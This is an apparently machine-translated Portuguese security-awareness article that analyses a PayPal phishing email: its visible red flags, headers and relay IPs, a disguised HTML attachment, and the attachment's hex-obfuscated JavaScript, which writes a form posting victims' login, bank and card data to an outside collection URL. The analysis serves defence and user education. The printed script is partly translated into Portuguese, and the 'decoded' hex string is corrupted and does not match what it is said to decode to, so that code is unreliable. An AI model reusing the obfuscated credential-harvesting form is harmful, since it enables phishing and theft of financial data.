Segurança online: decompondo a anatomia de um e-mail de phishing

Jun 25, 2025
Privacidade e segurança
CONTEÚDO NÃO CHEGADO


No mundo de hoje, onde as informações de todos estão online, o phishing é um dos ataques online mais populares e devastadores, porque você sempre pode limpar um vírus, mas se seus dados bancários forem roubados, você está em apuros. Aqui está uma análise de um desses ataques que recebemos.

Não pense que são apenas seus dados bancários que são importantes: afinal, se alguém ganha controle sobre o login da sua conta, não apenas conhece as informações contidas nessa conta, mas as chances são de que as mesmas informações de login possam ser usadas em vários outros contas. E se eles comprometerem sua conta de e-mail, eles podem redefinir todas as suas outras senhas.

Portanto, além de manter senhas fortes e variadas, você deve estar sempre alerta para e-mails falsos que se disfarçam de verdade. Embora a maioria das tentativas de phishing sejam amadoras, algumas são bastante convincentes, por isso é importante entender como reconhecê-las na superfície e também como funcionam nos bastidores.

Imagem por Asirap

Examinando o que está à vista

Nosso exemplo de e-mail, como a maioria das tentativas de phishing, "notifica" você sobre atividades em sua conta do PayPal que seriam, em circunstâncias normais, alarmantes. Portanto, a chamada à ação é verificar / restaurar sua conta, enviando quase todas as informações pessoais que você puder imaginar. Novamente, isso é bastante formal.

Embora certamente haja exceções, praticamente todos os e-mails de phishing e scam são carregados com sinalizadores vermelhos diretamente na própria mensagem. Mesmo que o texto seja convincente, geralmente você pode encontrar muitos erros espalhados por todo o corpo da mensagem, o que indica que a mensagem não é legítima.

O Corpo da Mensagem

À primeira vista, este é um dos melhores e-mails de phishing que já vi. Não há erros ortográficos ou gramaticais e a linguagem é lida de acordo com o que você pode esperar. No entanto, existem algumas bandeiras vermelhas que você pode ver quando examina o conteúdo um pouco mais de perto.

  • “Paypal” - O caso correto é “PayPal” (P maiúsculo). Você pode ver que as duas variações são usadas na mensagem. As empresas são muito ponderadas com sua marca, então é duvidoso que algo assim passasse no processo de revisão.
  • “Permitir ActiveX” - Quantas vezes você viu um negócio legítimo baseado na web do tamanho do Paypal usar um componente proprietário que só funciona em um único navegador, especialmente quando oferece suporte a vários navegadores? Claro, em algum lugar lá fora alguma empresa faz isso, mas isso é uma bandeira vermelha.
  • “Com segurança.” - Observe como esta palavra não se alinha na margem com o resto do texto do parágrafo. Mesmo se eu esticar a janela um pouco mais, ela não envolve ou espaça corretamente.
  • “Paypal!” - O espaço antes do ponto de exclamação parece estranho. Apenas outra peculiaridade que tenho certeza que não estaria em um e-mail legítimo.
  • “PayPal- Account Update Form.pdf.htm” - Por que o Paypal anexaria um “PDF”, especialmente quando poderia apenas vincular a uma página de seu site? Além disso, por que eles tentariam disfarçar um arquivo HTML como PDF? Esta é a maior bandeira vermelha de todas.

O Cabeçalho da Mensagem

Quando você olha o cabeçalho da mensagem, mais algumas bandeiras vermelhas aparecem:

  • O endereço de é [email protected] .
  • Falta o endereço para. Eu não deixei em branco, simplesmente não faz parte do cabeçalho da mensagem padrão. Normalmente, uma empresa que tem o seu nome personaliza o e-mail para você.

O anexo

Quando abro o anexo, você pode ver imediatamente que o layout não está correto, pois faltam informações de estilo. Novamente, por que o PayPal enviaria um formulário HTML por e-mail se ele poderia simplesmente fornecer um link em seu site?

Nota: usamos o visualizador de anexos HTML integrado do Gmail para isso, mas recomendamos que você NÃO ABRA anexos de golpistas. Nunca. Sempre. Freqüentemente, eles contêm exploits que instalarão trojans em seu PC para roubar as informações de sua conta.

Rolar um pouco mais para baixo você pode ver que este formulário pede não apenas nossas informações de login do PayPal, mas também informações bancárias e de cartão de crédito. Algumas das imagens estão quebradas.

É óbvio que essa tentativa de phishing está indo atrás de tudo de uma só vez.

A análise técnica

Embora deva estar bem claro, com base no que está à vista, que se trata de uma tentativa de phishing, agora vamos analisar a composição técnica do e-mail e ver o que podemos encontrar.

Informações do anexo

A primeira coisa a se dar uma olhada é a fonte HTML do formulário de anexo, que é o que envia os dados para o site falso.

Ao visualizar rapidamente a fonte, todos os links parecem válidos, pois apontam para “paypal.com” ou “paypalobjects.com”, que são ambos legítimos.

Agora vamos dar uma olhada em algumas informações básicas da página que o Firefox coleta na página.

Como você pode ver, alguns dos gráficos são extraídos dos domínios “blessedtobe.com”, “goodhealthpharmacy.com” e “pic-upload.de” em vez dos domínios legítimos do PayPal.

Informações dos cabeçalhos de e-mail

A seguir, daremos uma olhada nos cabeçalhos brutos das mensagens de e-mail. O Gmail disponibiliza isso por meio da opção de menu Mostrar original na mensagem.

Olhando as informações do cabeçalho da mensagem original, você pode ver que esta mensagem foi composta usando o Outlook Express 6. Duvido que o PayPal tenha alguém na equipe que envia cada uma dessas mensagens manualmente por meio de um cliente de e-mail desatualizado.

Agora, examinando as informações de roteamento, podemos ver o endereço IP do remetente e do servidor de retransmissão de email.

O endereço IP do “usuário” é o remetente original. Fazendo uma rápida consulta às informações de IP, podemos ver que o IP de envio está na Alemanha.

E quando olhamos para o endereço IP do servidor de retransmissão de email (mail.itak.at), podemos ver que este é um ISP com sede na Áustria. Duvido que o PayPal roteie seus e-mails diretamente por meio de um ISP com base na Áustria, pois eles têm um enorme farm de servidores que poderia facilmente realizar essa tarefa.

Para onde vão os dados?

Portanto, determinamos claramente que se trata de um e-mail de phishing e coletamos algumas informações sobre a origem da mensagem, mas e para onde seus dados são enviados?

Para ver isso, primeiro temos que salvar o anexo HTM em nosso desktop e abri-lo em um editor de texto. Percorrendo-o, tudo parece estar em ordem, exceto quando chegamos a um bloco Javascript de aparência suspeita.

Rompendo a fonte completa do último bloco de Javascript, vemos:

<script language = ”JavaScript” type = ”text / javascript”>
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; para (i = 0; i <x.length; i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>

Sempre que você vê uma grande sequência confusa de letras e números aparentemente aleatórios embutidos em um bloco de Javascript, geralmente é algo suspeito. Olhando para o código, a variável “x” é definida para esta grande string e então decodificada na variável “y”. O resultado final da variável “y” é então gravado no documento como HTML.

Como a string grande é composta de números 0-9 e letras a-f, é mais provável que seja codificada por meio de uma conversão simples de ASCII em Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706

Traduz para:

<form name = ”main” id = ”main” method = ”post” action = ”http://www.dexposure.net/bbs/data/verify.php”>

Não é por acaso que isso decodifica em uma tag de formulário HTML válida que envia os resultados não para o PayPal, mas para um site desonesto.

Além disso, ao visualizar o código-fonte HTML do formulário, você verá que essa tag de formulário não está visível porque é gerada dinamicamente por meio do Javascript. Esta é uma maneira inteligente de ocultar o que o HTML está realmente fazendo se alguém simplesmente visualizar a origem gerada do anexo (como fizemos anteriormente), em vez de abrir o anexo diretamente em um editor de texto.

Executando um whois rápido no site ofensivo, podemos ver que este é um domínio hospedado em um host popular, 1and1.

O que se destaca é que o domínio usa um nome legível (ao contrário de algo como “dfh3sjhskjhw.net”) e o domínio foi registrado há 4 anos. Por causa disso, acredito que este domínio foi sequestrado e usado como um peão nesta tentativa de phishing.

Cinismo é uma boa defesa

Quando se trata de ficar seguro online, nunca é demais ter um pouco de cinismo.

Embora eu tenha certeza de que há mais sinais de alerta no e-mail de exemplo, o que apontamos acima são indicadores que vimos depois de apenas alguns minutos de análise. Hipoteticamente, se o nível de superfície do e-mail imitasse sua contraparte legítima 100%, a análise técnica ainda revelaria sua verdadeira natureza. É por isso que é importante ser capaz de examinar o que você pode e não pode ver.

Breaking Bad Security Tutorial 1 - Email Phishing

Anatomy Of Phishing Campaigns: A Gmail Perspective

How To Identify A Phishing Email

[CYBER FRIGHT] Anatomy Of A Phishing Email

Security Awareness Quick Tip: How To Identify And Avoid Email Phishing Scams - Part 1

Cyber Security & Phishing

Understanding Anatomy Of Phishing Attack

Anatomy Of A Phishing Attack With DNSFilter

8th PPO-SA Webinar: Cyber Security: Beware Of Phishing Attach!

Cybersecurity Training How To Spot A Phishing Email

The Truth About Phishing: It Only Takes One

Anatomy Of Scam Emails - How To Recognise A Phishing Scam Message

Phishing Attack Example - How To Spot A Scam Email

What Is Phishing?

How To Spot A Phishing Fraud Email - Fun With Phishing | Tech Tip Tuesday

Hands-on Computer Security & Incident Response -- Email Header Analysis Part 1

Anatomy Of A Spearphishing Attack


Privacidade e segurança - Artigos mais populares

É seguro visualizar seu e-mail?

Privacidade e segurança May 10, 2025

Belozersky / Shutterstock No início dos anos 2000, muitos profissionais de segurança aconselharam desativar a função de visualização do seu..


Como identificar uma página falsa do Facebook

Privacidade e segurança May 11, 2025

CONTEÚDO NÃO CHEGADO Existem muitas páginas falsas do Facebook por aí. Na melhor das hipóteses, eles perdem seu tempo e talvez tentem vender alguns anúncios. Na pior das hip..


O que é um aplicativo “portátil” e por que ele é importante?

Privacidade e segurança May 22, 2025

Os aplicativos portáteis oferecem algumas vantagens definitivas sobre seus equivalentes tradicionais. Eles são leves e permitem que você alterne entre computadores enqua..


O que é RFID e é realmente uma preocupação de segurança?

Privacidade e segurança Sep 22, 2025

CONTEÚDO NÃO CHEGADO RFID é uma tecnologia que nos rodeia todos os dias. Está em nossos cartões de crédito, passaportes e alguns dos produtos que compramos. Até mesmo muito..


Como desativar a tela de bloqueio no Windows 10

Privacidade e segurança Apr 24, 2025

Com Atualização do aniversário do Windows 10 , A Microsoft não permite mais que você desative a tela de bloqueio usando um configuração de política de..


O que é a vulnerabilidade POODLE e como você pode se proteger?

Privacidade e segurança Sep 10, 2025

CONTEÚDO NÃO CHEGADO É difícil compreender todas essas catástrofes da Internet à medida que ocorrem, e assim como pensávamos que a Internet estava segura novamente depois q..


Como abrir uma guia InPrivate na versão Metro do Internet Explorer

Privacidade e segurança Sep 10, 2025

CONTEÚDO NÃO CHEGADO O Internet Explorer tem um modo secreto chamado InPrivate, que é praticamente o mesmo que o modo de navegação anônima do Chrome. Ele pode ser acessado n..


Como recuperar o acesso à sua conta de administrador no Windows Vista usando a Restauração do sistema

Privacidade e segurança May 8, 2025

CONTEÚDO NÃO CHEGADO Este é um post convidado de Aseem Kishore, um entusiasta da tecnologia e blogueiro líder de Online-Tech-Tips . ..


Categorias